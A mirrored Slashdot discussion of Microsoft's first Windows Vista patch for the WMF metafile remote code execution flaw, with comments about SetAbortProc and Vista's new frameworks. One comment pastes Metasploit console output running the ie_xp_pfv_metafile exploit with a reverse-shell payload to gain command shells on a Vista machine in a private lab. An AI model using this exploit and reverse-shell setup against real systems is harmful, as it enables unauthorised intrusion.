Slashdot Mirror
First Windows Vista Security Update Released
Bard Of Vim writes "Microsoft has issued critical security patches for beta testers running the Windows Vista December CTP (Community Technology Preview) and Windows Vista Beta 1, and warned that the new operating system was vulnerable to a remote code execution flaw in the Graphics Rendering Engine. The Vista patches address the same vulnerability that led to the WMF (Windows Metafile) malware attacks earlier this month. The recent out-of-cycle security update for the WMF vulnerability (see slashdot coverage) makes no mention of Windows Vista being vulnerable, but with the release of this weekend's patches it is clear that the poorly designed 'SetAbortProc,' the function that allows printing jobs to be canceled, was ported over to Vista."
"poorly designed 'SetAbortProc,' the function that allows printing jobs to be canceled, was ported over to Vista."
SetAbortProc is well designed. The problem is the code that handles the WMF. That code is allowing a payload to be placed on the stack and an incorrect pointer to be sent.
All set abort proc does is send an abort code to the print job and set a call back method to call when the abort completes.
-Rick
"Most people in the U.S. wouldn't know they live in a tyrannical state if it walked up and grabbed their junk." - MyFirs
I posted something about Vista being vulnerable to the WMF thing in a Vista Kernel post here not long ago. They got a little mad at me but that is okay. Everyone has to be mad at someone!
People were telling me you can't automatically exploit it but I fired up metasploit and was successful with the admin account and a non-priv account.
Administrator
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://10.1.1.101:8080/
[*] HTTP Client connected from 10.1.1.106:49450, redirecting...
[*] HTTP Client connected from 10.1.1.106:49451, redirecting...
[*] HTTP Client connected from 10.1.1.106:49452, redirecting...
[*] HTTP Client connected from 10.1.1.106:49453, sending 1864 bytes of payload...
[*] Got connection from 10.1.1.101:4321 10.1.1.106:49454
Microsoft Windows [Version 6.0.5112]
(C) Copyright 1985-2005 Microsoft Corp.
E:\Users\Administrator\Desktop>
Test account
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://10.1.1.101:8080/
[*] HTTP Client connected from 10.1.1.106:49487, redirecting...
[*] HTTP Client connected from 10.1.1.106:49488, redirecting...
[*] HTTP Client connected from 10.1.1.106:49489, sending 1864 bytes of payload...
[*] Got connection from 10.1.1.101:4321 10.1.1.106:49490
Microsoft Windows [Version 6.0.5112]
(C) Copyright 1985-2005 Microsoft Corp.
E:\Users\test\Desktop>
I am wondering what else they are going to import from the old technology. I was a Windows fan up until this WMF dealio. I work in an Information Security office and all of our staff are going to Mac. Ordered them Friday!
Actually, .NET 2.0 runs on everything short of Win95 AFAIK. Vista isn't about .NET 2.0 whatsoever, it's about a bunch of other new technologies:
.NET 2 and that people don't care about that is uninformed at best...
WPF: Windows Presentation Framework ("avalon"; using XAML): what WinFX and the new AERO Shell are based onto;
WCF: Windows Communication Foundation ("indigo": an enhancement to Web Services, MSMQ, etc);
WWF: Windows Workflow Foundation, to help take care of scenarios like the one that was asked on "ask.slashdot.org" just yesterday. Something that's becoming increasingly common/important nowadays.
People like to just dismiss Vista like it has nothing new or worthwhile, ignoring all the new stuff that actually IS there, not just the previous 3 things mentionned, but there's a great deal of other changes (video drivers not in kernel mode anymore, new audio and printing (both work quite differently), GUI rendered by the
There are differences. It may not be worthwhile to everyone, but as a programmer I'm looking forward to many of these advances (WCF seems really nice). Saying Vista is about
///<sig